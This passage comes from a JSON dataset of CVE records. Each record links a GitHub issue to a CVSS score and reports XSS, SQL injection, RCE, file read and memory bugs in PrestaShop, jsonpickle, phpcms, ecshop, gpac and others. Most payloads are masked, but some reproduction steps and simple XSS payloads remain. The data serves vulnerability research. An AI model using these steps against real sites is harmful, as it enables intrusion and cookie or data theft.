  54440. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  54441. "severity": "MEDIUM",
  54442. "baseScore": 5.4,
  54443. "impactScore": 2.7,
  54444. "exploitabilityScore": 2.3
  54445. },
  54446. {
  54447. "CVE_ID": "CVE-2020-21967",
  54448. "Issue_Url_old": "https://github.com/PrestaShop/PrestaShop/issues/20306",
  54449. "Issue_Url_new": "https://github.com/prestashop/prestashop/issues/20306",
  54450. "Repo_new": "prestashop/prestashop",
  54451. "Issue_Created_At": "2020-07-23T17:29:20Z",
  54452. "description": "Cross Site Scripting Issue in APITAG Using File Upload Functionality. APITAG An issue is discovered in APITAG version NUMBERTAG under the Catelog feature when using the file upload functionality for uploading the Files for various products. This issue exists because it fails to implement file content checks and improperly handles the output, resulting in cross site scripting attack that leads to cookie stealing or malicious actions. Steps to Reproduce NUMBERTAG Go to Catelog feature NUMBERTAG Click on File component and add the details accordingly NUMBERTAG Create a file with .html extension and enter the payload APITAG alert('XSS!!'); APITAG within it. APITAG its, APITAG NUMBERTAG Upload the file NUMBERTAG Login as customer and click on the file uploaded for the particular product NUMBERTAG You can see the XSS payload gets executed. CVSS Score: PATHTAG FILETAG FILETAG FILETAG",
  54453. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  54454. "severity": "MEDIUM",
  54455. "baseScore": 4.8,
  54456. "impactScore": 2.7,
  54457. "exploitabilityScore": 1.7
  54458. },
  54459. {
  54460. "CVE_ID": "CVE-2020-22083",
  54461. "Issue_Url_old": "https://github.com/jsonpickle/jsonpickle/issues/332",
  54462. "Issue_Url_new": "https://github.com/jsonpickle/jsonpickle/issues/332",
  54463. "Repo_new": "jsonpickle/jsonpickle",
  54464. "Issue_Created_At": "2020-12-17T14:50:46Z",
  54465. "description": "Jsonpickle APITAG function unsafely form objects that can lead to Remote code execution. APITAG NUMBERTAG allows remote code execution during deserialization of a malicious payload through the APITAG function. Attack Vectors : The jsonpickle can be exploited by deserialization of malicious jsonpickled payload with default APITAG function of its object. The payload can be easily generated by this payload generator: URLTAG and passed to decode function like object = APITAG it will certainly execute command.",
  54466. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  54467. "severity": "CRITICAL",
  54468. "baseScore": 9.8,
  54469. "impactScore": 5.9,
  54470. "exploitabilityScore": 3.9
  54471. },
  54472. {
  54473. "CVE_ID": "CVE-2020-22120",
  54474. "Issue_Url_old": "https://github.com/peacexie/imcat/issues/3",
  54475. "Issue_Url_new": "https://github.com/peacexie/imcat/issues/3",
  54476. "Repo_new": "peacexie/imcat",
  54477. "Issue_Created_At": "2020-02-10T04:28:16Z",
  54478. "description": "You code has a Code Execution Vulnerability in the backstage . APITAG the backstage FILETAG NUMBERTAG find \u201cDIY\u914d\u7f6e\u201d URLTAG NUMBERTAG Click on the \u201c\u4fee\u6539\u201d FILETAG NUMBERTAG Modify the content payload\uff1a APITAG And save it FILETAG NUMBERTAG Access to this file and it has a Code Execution FILETAG fix: APITAG best removal of this function",
  54479. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  54480. "severity": "HIGH",
  54481. "baseScore": 8.8,
  54482. "impactScore": 5.9,
  54483. "exploitabilityScore": 2.8
  54484. },
  54485. {
  54486. "CVE_ID": "CVE-2020-22124",
  54487. "Issue_Url_old": "https://github.com/876054426/vul/issues/1",
  54488. "Issue_Url_new": "https://github.com/876054426/vul/issues/1",
  54489. "Repo_new": "876054426/vul",
  54490. "Issue_Created_At": "2020-02-25T07:56:40Z",
  54491. "description": "joyplus cms NUMBERTAG has Any file to read vulnerability. Title: joyplus cms NUMBERTAG Any file to read vulnerability Date NUMBERTAG Exploit Author: Zeo Vendor Homepage: URLTAG and FILETAG Software Link: URLTAG Version NUMBERTAG Tested on Windows NUMBERTAG joyplus cms NUMBERTAG has a vulnerability that can Any file to read that would allow an attacker to Sensitive information website and mysql or ftp password Proof NUMBERTAG Normal installation site and login URLTAG NUMBERTAG Access to trigger the vulnerability site You can switch to any directory payload FILETAG You can switch to any directory PATHTAG FILETAG NUMBERTAG read the PATHTAG code Let the cat out of the mysql password You can switch to any directory\uff0cjust change the PATHTAG FILETAG",
  54492. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  54493. "severity": "HIGH",
  54494. "baseScore": 7.5,
  54495. "impactScore": 3.6,
  54496. "exploitabilityScore": 3.9
  54497. },
  54498. {
  54499. "CVE_ID": "CVE-2020-22148",
  54500. "Issue_Url_old": "https://github.com/Piwigo/Piwigo/issues/1157",
  54501. "Issue_Url_new": "https://github.com/piwigo/piwigo/issues/1157",
  54502. "Repo_new": "piwigo/piwigo",
  54503. "Issue_Created_At": "2020-02-12T02:40:57Z",
  54504. "description": "Stored Cross Site Scripting in APITAG Hi team, I just found a stored XSS in APITAG . Exploit Request : CODETAG APITAG APITAG FILETAG",
  54505. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  54506. "severity": "MEDIUM",
  54507. "baseScore": 6.1,
  54508. "impactScore": 2.7,
  54509. "exploitabilityScore": 2.8
  54510. },
  54511. {
  54512. "CVE_ID": "CVE-2020-22150",
  54513. "Issue_Url_old": "https://github.com/Piwigo/Piwigo/issues/1158",
  54514. "Issue_Url_new": "https://github.com/piwigo/piwigo/issues/1158",
  54515. "Repo_new": "piwigo/piwigo",
  54516. "Issue_Created_At": "2020-02-12T03:32:27Z",
  54517. "description": "XSS in APITAG Hi team! I found a XSS in XSS in APITAG Exploit Request: CODETAG APITAG FILETAG",
  54518. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  54519. "severity": "MEDIUM",
  54520. "baseScore": 6.1,
  54521. "impactScore": 2.7,
  54522. "exploitabilityScore": 2.8
  54523. },
  54524. {
  54525. "CVE_ID": "CVE-2020-22198",
  54526. "Issue_Url_old": "https://github.com/blindkey/DedeCMSv5/issues/1",
  54527. "Issue_Url_new": "https://github.com/blindkey/dedecmsv5/issues/1",
  54528. "Repo_new": "blindkey/dedecmsv5",
  54529. "Issue_Created_At": "2020-02-17T09:01:25Z",
  54530. "description": "ajax_membergroup.php mdescription SQL inject. FILETAG FILETAG line NUMBERTAG indicate that we can control mdescription variables . because there is no fillter fro var mdescription. so we can acheive a sql injection in that . like poc: GET PATHTAG description NUMBERTAG D@ APITAG , description APITAG APITAG APITAG Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG WOW NUMBERTAG Trident NUMBERTAG SLCC2; .NET CLR NUMBERTAG NET CLR NUMBERTAG NET CLR NUMBERTAG NET NUMBERTAG C; .NET NUMBERTAG E; r NUMBERTAG like APITAG Type NUMBERTAG d NUMBERTAG a NUMBERTAG d NUMBERTAG a",
  54531. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  54532. "severity": "CRITICAL",
  54533. "baseScore": 9.8,
  54534. "impactScore": 5.9,
  54535. "exploitabilityScore": 3.9
  54536. },
  54537. {
  54538. "CVE_ID": "CVE-2020-22199",
  54539. "Issue_Url_old": "https://github.com/blindkey/cve_like/issues/1",
  54540. "Issue_Url_new": "https://github.com/blindkey/cve_like/issues/1",
  54541. "Repo_new": "blindkey/cve_like",
  54542. "Issue_Created_At": "2020-02-17T11:17:50Z",
  54543. "description": "phpcms NUMBERTAG sp6 FILETAG SQL inject. today , i collect some traffic from internet and i found something like this. CODETAG so many scanner try to do some thiing . so i do some reserach .. FILETAG it's APITAG is no filter in FILETAG . the digg_mod trans to mod_id and get excute.",
  54544. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  54545. "severity": "CRITICAL",
  54546. "baseScore": 9.8,
  54547. "impactScore": 5.9,
  54548. "exploitabilityScore": 3.9
  54549. },
  54550. {
  54551. "CVE_ID": "CVE-2020-22200",
  54552. "Issue_Url_old": "https://github.com/blindkey/cve_like/issues/2",
  54553. "Issue_Url_new": "https://github.com/blindkey/cve_like/issues/2",
  54554. "Repo_new": "blindkey/cve_like",
  54555. "Issue_Created_At": "2020-02-17T12:06:58Z",
  54556. "description": "PHPCMS NUMBERTAG public_get_suggest_keyword any file read. some think like this in honeypot get my attension . APITAG and i did some google ,found that in PHPCMS NUMBERTAG the file FILETAG q parame pass to file_get_content.. i do some more google ,and found that it still APITAG below. FILETAG",
  54557. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  54558. "severity": "MEDIUM",
  54559. "baseScore": 5.3,
  54560. "impactScore": 1.4,
  54561. "exploitabilityScore": 3.9
  54562. },
  54563. {
  54564. "CVE_ID": "CVE-2020-22201",
  54565. "Issue_Url_old": "https://github.com/blindkey/cve_like/issues/4",
  54566. "Issue_Url_new": "https://github.com/blindkey/cve_like/issues/4",
  54567. "Repo_new": "blindkey/cve_like",
  54568. "Issue_Created_At": "2020-02-18T03:32:57Z",
  54569. "description": "phpcms NUMBERTAG FILETAG pagesize parameters RCE. phpcms NUMBERTAG in FILETAG FILETAG there is no filter before or after the pagesize value pass to $urlrules FILETAG and after template render ,we come to a function which will evaluate the data like below: FILETAG so the evalutate will trigger a arbitry command injection. poc like this: APITAG",
  54570. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  54571. "severity": "HIGH",
  54572. "baseScore": 8.8,
  54573. "impactScore": 5.9,
  54574. "exploitabilityScore": 2.8
  54575. },
  54576. {
  54577. "CVE_ID": "CVE-2020-22203",
  54578. "Issue_Url_old": "https://github.com/blindkey/cve_like/issues/6",
  54579. "Issue_Url_new": "https://github.com/blindkey/cve_like/issues/6",
  54580. "Repo_new": "blindkey/cve_like",
  54581. "Issue_Created_At": "2020-02-18T04:34:34Z",
  54582. "description": "phpcms NUMBERTAG FILETAG genre parameter sql inject. FILETAG FILETAG genre parameters pass to sql command without filter poc: CODETAG",
  54583. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  54584. "severity": "CRITICAL",
  54585. "baseScore": 9.8,
  54586. "impactScore": 5.9,
  54587. "exploitabilityScore": 3.9
  54588. },
  54589. {
  54590. "CVE_ID": "CVE-2020-22204",
  54591. "Issue_Url_old": "https://github.com/blindkey/cve_like/issues/7",
  54592. "Issue_Url_new": "https://github.com/blindkey/cve_like/issues/7",
  54593. "Repo_new": "blindkey/cve_like",
  54594. "Issue_Created_At": "2020-02-18T04:53:25Z",
  54595. "description": "ecshop NUMBERTAG FILETAG goods_number sql inject. ecshop NUMBERTAG FILETAG FILETAG flow_update_cart($_POST FILETAG use to make value as int ,but forget to do the same with key vars .. so leads to sql inject . hackers can do this like : CODETAG",
  54596. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  54597. "severity": "CRITICAL",
  54598. "baseScore": 9.8,
  54599. "impactScore": 5.9,
  54600. "exploitabilityScore": 3.9
  54601. },
  54602. {
  54603. "CVE_ID": "CVE-2020-22205",
  54604. "Issue_Url_old": "https://github.com/blindkey/cve_like/issues/8",
  54605. "Issue_Url_new": "https://github.com/blindkey/cve_like/issues/8",
  54606. "Repo_new": "blindkey/cve_like",
  54607. "Issue_Created_At": "2020-02-18T05:24:17Z",
  54608. "description": "ecshop NUMBERTAG FILETAG id APITAG ecshop NUMBERTAG FILETAG FILETAG at line NUMBERTAG id was passe to execute without filter and leads to sql inject",
  54609. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  54610. "severity": "CRITICAL",
  54611. "baseScore": 9.8,
  54612. "impactScore": 5.9,
  54613. "exploitabilityScore": 3.9
  54614. },
  54615. {
  54616. "CVE_ID": "CVE-2020-22206",
  54617. "Issue_Url_old": "https://github.com/blindkey/cve_like/issues/9",
  54618. "Issue_Url_new": "https://github.com/blindkey/cve_like/issues/9",
  54619. "Repo_new": "blindkey/cve_like",
  54620. "Issue_Created_At": "2020-02-18T05:36:12Z",
  54621. "description": "ecshop NUMBERTAG FILETAG aid SQL inject. FILETAG FILETAG auid parameters pass to sqladd without filter leads to sql inejct .",
  54622. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  54623. "severity": "CRITICAL",
  54624. "baseScore": 9.8,
  54625. "impactScore": 5.9,
  54626. "exploitabilityScore": 3.9
  54627. },
  54628. {
  54629. "CVE_ID": "CVE-2020-22208",
  54630. "Issue_Url_old": "https://github.com/blindkey/cve_like/issues/10",
  54631. "Issue_Url_new": "https://github.com/blindkey/cve_like/issues/10",
  54632. "Repo_new": "blindkey/cve_like",
  54633. "Issue_Created_At": "2020-02-18T12:35:38Z",
  54634. "description": "NUMBERTAG cms NUMBERTAG FILETAG x APITAG . PATHTAG FILETAG $alphabet=trim($_GET['x']); and then $alphabet has been pass to sql without filter so leads to sql inject poc like : ERRORTAG",
  54635. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  54636. "severity": "CRITICAL",
  54637. "baseScore": 9.8,
  54638. "impactScore": 5.9,
  54639. "exploitabilityScore": 3.9
  54640. },
  54641. {
  54642. "CVE_ID": "CVE-2020-22209",
  54643. "Issue_Url_old": "https://github.com/blindkey/cve_like/issues/12",
  54644. "Issue_Url_new": "https://github.com/blindkey/cve_like/issues/12",
  54645. "Repo_new": "blindkey/cve_like",
  54646. "Issue_Created_At": "2020-02-18T12:44:54Z",
  54647. "description": "NUMBERTAG cms NUMBERTAG ajax_common query SQL inject . FILETAG FILETAG $_GET['query'] pass to $gbk_query and then $gbk_query get iconv so use some special word to do something with iconv ,like wide charactars( such as NUMBERTAG c NUMBERTAG chinese word or some thing . and then get into sql and finally leads to sql inject . poc: ERRORTAG",
  54648. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  54649. "severity": "CRITICAL",
  54650. "baseScore": 9.8,
  54651. "impactScore": 5.9,
  54652. "exploitabilityScore": 3.9
  54653. },
  54654. {
  54655. "CVE_ID": "CVE-2020-22210",
  54656. "Issue_Url_old": "https://github.com/blindkey/cve_like/issues/11",
  54657. "Issue_Url_new": "https://github.com/blindkey/cve_like/issues/11",
  54658. "Repo_new": "blindkey/cve_like",
  54659. "Issue_Created_At": "2020-02-18T12:38:29Z",
  54660. "description": "NUMBERTAG cms NUMBERTAG FILETAG x SQL inject . PATHTAG FILETAG exactly the same as what happend to FILETAG x pass to alphabet and get in within a sql expression without filter ,so leads to sql inject poc the same : ERRORTAG",
  54661. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  54662. "severity": "CRITICAL",
  54663. "baseScore": 9.8,
  54664. "impactScore": 5.9,
  54665. "exploitabilityScore": 3.9
  54666. },
  54667. {
  54668. "CVE_ID": "CVE-2020-22211",
  54669. "Issue_Url_old": "https://github.com/blindkey/cve_like/issues/13",
  54670. "Issue_Url_new": "https://github.com/blindkey/cve_like/issues/13",
  54671. "Repo_new": "blindkey/cve_like",
  54672. "Issue_Created_At": "2020-02-18T12:49:10Z",
  54673. "description": "NUMBERTAG cms FILETAG key SQL inject . quite like the one URLTAG look at the file with the act = \"key\" below FILETAG $keys just get iconv and then pass to the sql ,and finally leads to sql inject .. poc: ERRORTAG",
  54674. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  54675. "severity": "CRITICAL",
  54676. "baseScore": 9.8,
  54677. "impactScore": 5.9,
  54678. "exploitabilityScore": 3.9
  54679. },
  54680. {
  54681. "CVE_ID": "CVE-2020-22212",
  54682. "Issue_Url_old": "https://github.com/blindkey/cve_like/issues/14",
  54683. "Issue_Url_new": "https://github.com/blindkey/cve_like/issues/14",
  54684. "Repo_new": "blindkey/cve_like",
  54685. "Issue_Created_At": "2020-02-18T12:57:08Z",
  54686. "description": "NUMBERTAG cms NUMBERTAG FILETAG id SQL inject . in file FILETAG FILETAG $smarty APITAG id was direcly pass to sql expression and finally leads to sql inject .",
  54687. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  54688. "severity": "CRITICAL",
  54689. "baseScore": 9.8,
  54690. "impactScore": 5.9,
  54691. "exploitabilityScore": 3.9
  54692. },
  54693. {
  54694. "CVE_ID": "CVE-2020-22251",
  54695. "Issue_Url_old": "https://github.com/phpList/phplist3/issues/660",
  54696. "Issue_Url_new": "https://github.com/phplist/phplist3/issues/660",
  54697. "Repo_new": "phplist/phplist3",
  54698. "Issue_Created_At": "2020-05-18T16:59:44Z",
  54699. "description": "XSS vulnerability in version NUMBERTAG and lower. XSS vulnerability exists in admin page while adding a new administrator in the Login name field. Steps to Reproduce NUMBERTAG Login as administrator NUMBERTAG Navigate to the APITAG administrators\" under config NUMBERTAG Click on APITAG new admin NUMBERTAG Inject the payload in the Login name field Payload: APITAG alert NUMBERTAG APITAG NUMBERTAG Enter any other required details and click on APITAG changes\" POC: FILETAG",
  54700. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  54701. "severity": "MEDIUM",
  54702. "baseScore": 4.8,
  54703. "impactScore": 2.7,
  54704. "exploitabilityScore": 1.7
  54705. },
  54706. {
  54707. "CVE_ID": "CVE-2020-22312",
  54708. "Issue_Url_old": "https://github.com/wlx65003/HZNUOJ/issues/17",
  54709. "Issue_Url_new": "https://github.com/lixin-wei/hznuoj/issues/17",
  54710. "Repo_new": "lixin-wei/hznuoj",
  54711. "Issue_Created_At": "2020-02-25T08:32:50Z",
  54712. "description": "Strict SQL filtering leads to xss injection vulnerability. description The code problem occurred in APITAG . The APITAG in the output form was obtained from the database. There was no filtering of angle brackets \u201c APITAG \u201d during registration, which caused the reorganization here. xss injection FILETAG Attack process CODETAG FILETAG Then visit APITAG , set the APITAG to soft NUMBERTAG and click submit FILETAG the attack works FILETAG poc APITAG",
  54713. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  54714. "severity": "MEDIUM",
  54715. "baseScore": 6.1,
  54716. "impactScore": 2.7,
  54717. "exploitabilityScore": 2.8
  54718. },
  54719. {
  54720. "CVE_ID": "CVE-2020-22330",
  54721. "Issue_Url_old": "https://github.com/intelliants/subrion/issues/850",
  54722. "Issue_Url_new": "https://github.com/intelliants/subrion/issues/850",
  54723. "Repo_new": "intelliants/subrion",
  54724. "Issue_Created_At": "2019-12-18T06:59:25Z",
  54725. "description": "Possible Cross site scripting (XSS) . SCOPE: Package: Subrion CMS Version NUMBERTAG ISSUE: XSS Vulnerability Description: The software does not neutralize or incorrectly neutralizes user controllable input before it is placed in output that is used as a web page that is served to other users. As a result, an attacker can inject and execute arbitrary HTML and script code in user's browser in context of a vulnerable website. Vulnerability Classification: CWE NUMBERTAG APITAG NUMBERTAG CVSS NUMBERTAG PATHTAG Steps To Reproduce: Login Click on contents APITAG APITAG page APITAG Fill the details APITAG In title give the payload APITAG APITAG Now click on blocks while adding a new block XSS is being triggered. APITAG Reference: CVETAG Mitigations: Perform sanitation of input data before inserting it into the page content. Escaping user input. Validating user input.",
  54726. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  54727. "severity": "MEDIUM",
  54728. "baseScore": 6.1,
  54729. "impactScore": 2.7,
  54730. "exploitabilityScore": 2.8
  54731. },
  54732. {
  54733. "CVE_ID": "CVE-2020-22352",
  54734. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1423",
  54735. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1423",
  54736. "Repo_new": "gpac/gpac",
  54737. "Issue_Created_At": "2020-03-01T19:19:26Z",
  54738. "description": "APITAG NULL pointer dereference in APITAG in APITAG Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG Thanks dr3dd",
  54739. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  54740. "severity": "MEDIUM",
  54741. "baseScore": 5.5,
  54742. "impactScore": 3.6,
  54743. "exploitabilityScore": 1.8
  54744. },
  54745. {
  54746. "CVE_ID": "CVE-2020-22392",
  54747. "Issue_Url_old": "https://github.com/intelliants/subrion/issues/868",
  54748. "Issue_Url_new": "https://github.com/intelliants/subrion/issues/868",
  54749. "Repo_new": "intelliants/subrion",
  54750. "Issue_Created_At": "2020-03-05T02:55:23Z",
  54751. "description": "Blog Stored XSS Vulnerability. Hello,I found a stored xss bug when add blog. At first add a blog and upload image ,then edit APITAG file \u201dx\u201d onerror=\u201dalert(/xss/). Browse blog trigger XSS. Suggestion call APITAG to image FILETAG FILETAG",
  54752. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  54753. "severity": "MEDIUM",
  54754. "baseScore": 5.4,
  54755. "impactScore": 2.7,
  54756. "exploitabilityScore": 2.3
  54757. },
  54758. {
  54759. "CVE_ID": "CVE-2020-22394",
  54760. "Issue_Url_old": "https://github.com/yzmcms/yzmcms/issues/42",
  54761. "Issue_Url_new": "https://github.com/yzmcms/yzmcms/issues/42",
  54762. "Repo_new": "yzmcms/yzmcms",
  54763. "Issue_Created_At": "2020-03-04T11:56:13Z",
  54764. "description": "XSS vulnerability exists in member submission function. \u4f1a\u5458\u6295\u7a3f\u529f\u80fd\uff0c\u4f7f\u7528\u5982\u4e0bpayload\u5373\u53ef\u9020\u6210xss APITAG APITAG APITAG FILETAG \u6211\u5728\u5b98\u65b9\u6f14\u793a\u7ad9\u6295\u7a3f\u4e86\u4e00\u4e2a\u6587\u7ae0\uff0cid NUMBERTAG",
  54765. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  54766. "severity": "MEDIUM",
  54767. "baseScore": 6.1,
  54768. "impactScore": 2.7,
  54769. "exploitabilityScore": 2.8
  54770. },
  54771. {
  54772. "CVE_ID": "CVE-2020-22481",
  54773. "Issue_Url_old": "https://github.com/hacklcx/HFish/issues/69",
  54774. "Issue_Url_new": "https://github.com/hacklcx/hfish/issues/69",
  54775. "Repo_new": "hacklcx/hfish",
  54776. "Issue_Created_At": "2020-03-15T05:35:23Z",
  54777. "description": "XSS exists in the information,can get cookie. In any phishing interface, where the password needs to be entered, the use of img tags can cause XSS attacks. FILETAG Use the following code to get a cookie. ERRORTAG FILETAG",
  54778. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  54779. "severity": "MEDIUM",
  54780. "baseScore": 6.1,
  54781. "impactScore": 2.7,
  54782. "exploitabilityScore": 2.8
  54783. },
  54784. {
  54785. "CVE_ID": "CVE-2020-22535",
  54786. "Issue_Url_old": "https://github.com/Pbootcms/Pbootcms/issues/5",
  54787. "Issue_Url_new": "https://github.com/pbootcms/pbootcms/issues/5",
  54788. "Repo_new": "pbootcms/pbootcms",
  54789. "Issue_Created_At": "2020-03-20T12:37:57Z",
  54790. "description": "Pbootcms NUMBERTAG has a management background arbitrary file download vulnerability. The vulnerability lies in the update function of the FILETAG file. In this function, the 'list' variable is spliced into the path without filtering, so any file can be copied under the '/ backup / upgrade /' path, and then the file can be downloaded by directly accessing the file. APITAG in to the / FILETAG page. FILETAG APITAG the '/ pbootcms / Admin. PHP? P = / upgrade / update' to request that the contents of the list point to the file to be downloaded FILETAG APITAG visit '\\ pbootcms \\ static \\ backup \\ extensions \\ APITAG \\ conf \\ nginx. Conf' to download to the file FILETAG code FILETAG The filtering of 'list' is not strict.",
  54791. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  54792. "severity": "MEDIUM",
  54793. "baseScore": 6.5,
  54794. "impactScore": 3.6,
  54795. "exploitabilityScore": 2.8
  54796. },
  54797. {
  54798. "CVE_ID": "CVE-2020-22643",
  54799. "Issue_Url_old": "https://github.com/liufee/cms/issues/51",
  54800. "Issue_Url_new": "https://github.com/liufee/cms/issues/51",
  54801. "Repo_new": "liufee/cms",
  54802. "Issue_Created_At": "2020-03-27T10:09:42Z",
  54803. "description": "\u540e\u53f0\u5934\u50cf\u7ba1\u7406\u6a21\u5757\u5b58\u5728\u4efb\u610f\u6587\u4ef6\u4e0a\u4f20getshell NUMBERTAG The administrator will use the APITAG function in the PATHTAG file to modify the avatar. This function will call Util's APITAG function FILETAG NUMBERTAG We continue to use the APITAG function to find that the function directly calls the upload function without filtering the file name. FILETAG NUMBERTAG We followed up the APITAG function and found that the temporary file was directly moved to an undetected file name. FILETAG NUMBERTAG ulnerability verification FILETAG FILETAG FILETAG FILETAG",
  54804. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  54805. "severity": "HIGH",
  54806. "baseScore": 7.2,
  54807. "impactScore": 5.9,
  54808. "exploitabilityScore": 1.2
  54809. },
  54810. {
  54811. "CVE_ID": "CVE-2020-22650",
  54812. "Issue_Url_old": "https://github.com/jpalanco/alienvault-ossim/issues/4",
  54813. "Issue_Url_new": "https://github.com/jpalanco/alienvault-ossim/issues/4",
  54814. "Repo_new": "jpalanco/alienvault-ossim",
  54815. "Issue_Created_At": "2020-03-27T02:27:37Z",
  54816. "description": "A memory leak Vulnerability. I discovered the memory leak vulnerability on NUMBERTAG th lines in file sim organizer.c. The memory allocated the function APITAG is not freed\uff0cbefore the function sim_event_unref (event) is called. As well as event >backlog_id is the member of the structure event. So when lots of alarm events occurs, increasing memory usage can cause system crash.",
  54817. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  54818. "severity": "HIGH",
  54819. "baseScore": 7.5,
  54820. "impactScore": 3.6,
  54821. "exploitabilityScore": 3.9
  54822. },
  54823. {
  54824. "CVE_ID": "CVE-2020-22673",
  54825. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1342",
  54826. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1342",
  54827. "Repo_new": "gpac/gpac",
  54828. "Issue_Created_At": "2019-11-13T04:06:43Z",
  54829. "description": "There are memory leaks in the APITAG function of APITAG Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! \u221a] I looked for a similar issue and couldn't find any. [ \u221a] I tried with the latest version of GPAC. Installers available at URLTAG [ \u221a] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command line ...). I can share files anonymously with this dropbox: URLTAG Detailed guidelines: URLTAG A crafted input will lead to crash in box_code_drm.c at gpac NUMBERTAG Triggered by APITAG diso POC out /dev/null Poc NUMBERTAG memleak senc NUMBERTAG URLTAG The ASAN information is as follows: ERRORTAG",
  54830. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  54831. "severity": "MEDIUM",
  54832. "baseScore": 5.5,
  54833. "impactScore": 3.6,
  54834. "exploitabilityScore": 1.8
  54835. },
  54836. {
  54837. "CVE_ID": "CVE-2020-22674",
  54838. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1346",
  54839. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1346",
  54840. "Repo_new": "gpac/gpac",
  54841. "Issue_Created_At": "2019-11-13T07:15:54Z",
  54842. "description": "There is a heap buffer overflow in the APITAG function of APITAG Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! \u221a] I looked for a similar issue and couldn't find any. [ \u221a] I tried with the latest version of GPAC. Installers available at URLTAG [ \u221a] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command line ...). I can share files anonymously with this dropbox: URLTAG Detailed guidelines: URLTAG A crafted input will lead to crash in isom_intern.c at gpac NUMBERTAG Triggered by APITAG diso POC out /dev/null Poc NUMBERTAG invalid APITAG URLTAG The ASAN information is as follows: ERRORTAG",
  54843. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  54844. "severity": "MEDIUM",
  54845. "baseScore": 5.5,
  54846. "impactScore": 3.6,
  54847. "exploitabilityScore": 1.8
  54848. },
  54849. {
  54850. "CVE_ID": "CVE-2020-22675",
  54851. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1344",
  54852. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1344",
  54853. "Repo_new": "gpac/gpac",
  54854. "Issue_Created_At": "2019-11-13T05:18:43Z",
  54855. "description": "There is a heap buffer overflow in the APITAG function of APITAG Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! \u221a] I looked for a similar issue and couldn't find any. [ \u221a] I tried with the latest version of GPAC. Installers available at URLTAG [ \u221a] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command line ...). I can share files anonymously with this dropbox: URLTAG Detailed guidelines: URLTAG A crafted input will lead to crash in stbl_read.c at gpac NUMBERTAG Triggered by APITAG diso POC out /dev/null Poc APITAG heap URLTAG The ASAN information is as follows: ERRORTAG",
  54856. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  54857. "severity": "MEDIUM",
  54858. "baseScore": 5.5,
  54859. "impactScore": 3.6,
  54860. "exploitabilityScore": 1.8
  54861. },
  54862. {
  54863. "CVE_ID": "CVE-2020-22677",
  54864. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1341",
